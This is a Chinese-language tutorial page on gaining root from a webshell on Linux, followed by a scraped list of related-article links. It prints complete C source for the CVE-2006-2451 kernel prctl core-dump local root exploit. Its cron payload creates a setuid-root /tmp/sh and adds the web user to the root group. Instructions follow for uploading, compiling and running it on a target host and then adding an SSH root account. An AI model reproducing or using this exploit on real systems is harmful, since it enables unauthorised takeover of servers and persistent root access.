webshell提权教程linux,Linux下WEBSHELL提权
用phpshell2.0和Linux Kernel2.6x 本地溢出代码配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。
前提:1、目标机上安装了GCC能编译源码
2、Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4)
因为是在webshell里溢出成功也得不到返回的ROOT SHELL,所以要稍微修改下源码,把当前运行HTTP进程的用户加入到ROOT组(红色显示),让WEBSHELL有ROOT权限.
/**********溢出代码**************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer (main PoC code) */
/* - RoMaNSoFt (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ;
gpasswd -a wwwrun root ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n");
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
sleep(62);
printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
system("/tmp/sh -p");
}
把上面的代码保存为tmp.c,上传到目标主机/tmp目录下,接着PHPSHELL里编译gcc -o tmp tmp.c ,然后执行./tmp(有时候需要执行几次才能成功).
用whoami命令看下你会发现你的WEBSHELL权限是ROOT.
char *payload 后面的命令都是以ROOT执行的,如果开放了SSH并且没做登陆限制,可以直接到那添加一个用户并加入到ROOT组,自己发挥~~~~~
webshell提权教程linux,Linux下WEBSHELL提权相关推荐
- linux 负数_linux内核提权系列教程(2):任意地址读写到提权的4种方法
一.漏洞代码分析 代码见arbitrary.h. 1.功能函数介绍 功能 输入结构名 输入结构 功能 ARBITRARY_RW_INIT init_args size 初始化全局对象,存于g_mem_ ...
- 一套webshell提权教程
前言:webshell提权一直就是脚本方面最受欢迎的一个问题,当然也是最困难的一个问题,所以我根据自己平时提权的一些方法和网络收集的文 章总成了这一套webshell提权教程,希望大家能够学习到东西, ...
- webshell提权教程小结
前言:webshell提权一直就是脚本方面最受欢迎的一个问题,当然也是最困难的一个问题,所以我根据自己平时提权的一些方法和网络收集的文 章总成了这一套webshell提权教程,希望大家能够学习到东西, ...
- Linux下SUID提权方法
目录 SUID 1. 利用find文件提权 vulnhub靶机DC-1渗透-SUID提权 SUID SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户 ...
- DAY28:Linux、Windows 系统提权
DAY28:Linux.Windows 系统提权 1.Linux 系统提权 1.1.Linux 系统版本 linux发行版本: • centos • redhat • ubuntu • kali 1. ...
- 提权(最全的WEBSHELL)
最全的WEBSHELL c: d: e:- C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv ...
- linux root权限_Linux 提权技术
通过这篇文章,你讲了解到一下知识: 什么是提权? 为什么要提权? Linux 提权方法有哪些? 什么是提权? 一次完整的渗透测试流程,应该包含 主机发现 > 服务枚举 > 实施攻击 > ...
- 如何在Linux系统下的IntelliJ IDEA 2018.3.5下载与安装以及激活教程
如何在Linux系统下的IntelliJ IDEA 2018.3.5下载与安装以及激活教程 作者:张国军_Suger 开发工具与关键技术:VMware Workstation Pro.Linux系统( ...
- Windows与Linux的MYSQL UDF提权分析
原理分析 什么是UDF 所谓UDF 就是user define function的简称,就是用户自定义函数,用户可以添加函数到mysql中实现功能的扩充,调用方法和一般函数一样类似于database( ...
最新文章
- POwershell 更改文件权限
- 算法专题 二分法 普及组【2015】四2 C++版
- Factorized TDNN(因子分解TDNN,TDNN-F)
- ThinkPHP5 封装邮件发送服务(可发附件)
- php跳一跳小游戏,原生JS实现的跳一跳小游戏完整实例
- 今天提交了一个patch开心,呵呵
- linux内核input子系统解析,ARM Linux内核Input输入子系统浅解
- 如何卸载电脑oracle,如何完整的卸载ORACLE -电脑资料
- oralce的function处理考勤时间节点以及计算工作时间
- 前端路由: hash history 模式
- 属性篇(4)—If you love css …
- 【零基础 快速学Java】韩顺平 笔记整理(到p170 跑路了)
- 连续型随机变量+分布函数+密度函数+联合分布函数
- 使用EasyPoi导出word并转换为pdf
- 清除计算机用户缓存,清理缓存怎么清理_如何清理电脑缓存垃圾-win7之家
- 因为高考是最相对公平的一次竞争和选拔
- 你选的低功耗MCU是不是真省电?看后请自测
- 广域网 —— HDLC协议
- 达梦数据库disql常用语句(一)
- WPF 实现简易北京地铁效果图
热门文章
- server sql 众数_sql 语句系列(众数中位数与百分比)[八百章之第十五章]
- python数字转字符串_python如何将字符转换为数字
- JAVA入门级教学之(逻辑(布尔)运算符)
- python 3.7.732位安装步骤_Python3.7安装pyaudio教程解析
- python背景颜色怎么随机_Python中的随机颜色
- windows多用户 文件夹不共享_手把手教你如何使用Tekla多用户
- php数组转ini文件,php – 将数组转换为.ini文件
- 厦门大学2016年c语言程序设计,厦门大学c语言程序设计2016模拟题讲评及课程复习.pptx...
- C语言和其他高级语言的最大的区别是什么?
- python视窗编程_[PYTHON] 核心编程笔记(19.图形用户界面编程)